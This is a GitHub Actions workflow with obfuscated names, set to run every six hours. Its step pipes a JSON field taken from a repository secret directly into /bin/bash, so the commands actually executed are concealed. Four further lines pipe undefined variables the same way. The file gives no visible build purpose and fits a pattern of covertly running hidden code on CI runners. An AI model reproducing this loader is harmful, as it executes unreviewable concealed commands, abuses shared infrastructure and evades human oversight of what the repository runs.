name: zhaojinan7890
on:
  workflow_dispatch:
  schedule:
    - cron: '53 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhaojinan7890
        env:
          eo81471: ${{ secrets.eo81471 }}
        run: |
          echo $eo81471 | jq -r .gvz46 | /bin/bash
          echo $srfpo85103 | jq -r .oi25 | /bin/bash
          echo $rf3495 | jq -r .q39 | /bin/bash
          echo $l837 | jq -r .xch99708 | /bin/bash
          echo $aqt37 | jq -r .nre300 | /bin/bash

